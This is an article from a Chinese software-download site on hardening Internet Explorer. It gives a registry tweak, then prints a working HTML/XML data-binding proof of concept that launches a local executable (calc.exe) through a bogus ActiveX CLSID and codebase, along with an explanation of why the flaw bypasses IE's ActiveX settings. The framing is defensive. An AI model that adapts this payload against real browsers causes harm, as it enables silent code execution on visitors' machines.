极速下载站 —— 提供优质软件下载服务,感受全新的极速下载体验!

最近更新 | 软件专题 | 软件分类 | 软件排行

您的位置:极速下载站资讯首页其他资讯网络资讯 → IE防黑技巧十则,让你绿色上网更安全《四》

IE防黑技巧十则,让你绿色上网更安全《四》

时间:2019-09-07 15:32:21  作者:Mesa  浏览量:53

图:

图一 IE防黑技巧十则,让你绿色上网更安全《四》

进入下载
Internet Explorer 8.0 XP
Internet Explorer 8.0 XP 8.0 官方中文版...
大小:16.11 MB
日期:2019/9/7 15:34:16
环境:WinXP,

核心提示:针对IE的恶意修改、攻击方法非常多,本文中介绍的十种反黑技巧,一定会对你有所帮助。

针对IE的恶意修改、攻击方法非常多,本文中介绍的十种反黑技巧,一定会对你有所帮助。

下面是具体的方法:打开“开始”菜单中的“运行”,在弹出的“运行”对话框中输入Regedit.exe,打开注册表编辑器,点击前面的“+”号顺次展开到:HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet Settingsones,在右边窗口中找到DWord值“Flags”,默认键值为十六进制的21(十进制33),双击“Flags”,在弹出的对话框中将它的键值改为“1”即可,关闭注册表编辑器。无需重新启动电脑,重新打开IE,再次点击“工具→Internet选项→安全”标签,你就会看到多了一个“我的电脑”图标,在这里你可以对IE的本地安全进行配置。

图:

图二 IE防黑技巧十则,让你绿色上网更安全《四》

这个小技巧有什么用呢?把下面的代码保存为一个html文件,然后运行试试就知道了:

注意:请把<;替换为向左的尖括号,把>;替换为向右的尖括号。

<;span datasrc=\"#oExec\" datafld=\"exploit\" dataformatas=\"html">;<;/span>;

<;xml id=\"oExec\">;

<;security>;

<;exploit>;

<;![CDATA[

<;object id=\"oFile\"

classid=\"clsid:88888888-8888-8888-8888-888888888888"

codebase=\"c:/winnt/system32/calc.exe">;<;/object>;

]]>;

<;/exploit>;

<;/security>;

<;/xml>;

运行上面的html文件,会打开你的计算机中c:/winnt/system32文件夹下的calc.exe文件!而且IE没有任何提示!即使在IE的安全设置中禁用ActiveX控件上述代码也能工作!如果不是calc.exe文件而是其他恶意文件又会怎么样?如果是在你浏览的网页中含有类似上面的代码又会怎么样?真危险啊!

图:

图三 IE防黑技巧十则,让你绿色上网更安全《四》

之所以会这样是由于IE存在两个可怕的漏洞:可本地执行任意命令,IE的ActiveX安全设置可被绕过。在上述代码中我们给IE指定了一个系统中并不存在的控件号(\"clsid:88888888-8888-8888-8888-888888888888),IE会试图从codebase指定的地址去下载并安装改控件。根据codebase于是IE找到了c:/winnt/system32/calc.exe,接着IE开始“下载”并安装该程序。由于calc.exe是EXE文件,这样就等于是在运行该文件,所以calc.exe就被运行了!

Internet Explorer 8.0 XP 8.0 官方中文版

Internet Explorer 8.0 XP图片
  • 软件性质:国外软件
  • 授权方式:免费版
  • 软件语言:简体中文
  • 软件大小:16499 KB
  • 下载次数:15860 次
  • 更新时间:2019/9/7 8:21:48
  • 运行平台:WinXP,...
  • 软件描述:IE8(Internet Explorer 8)是一款优秀的多标签网页浏览器,由... [立即下载]

相关资讯

网络资讯排行
最新网络资讯
其他资讯分类

更多常用电脑软件

更多同类软件专题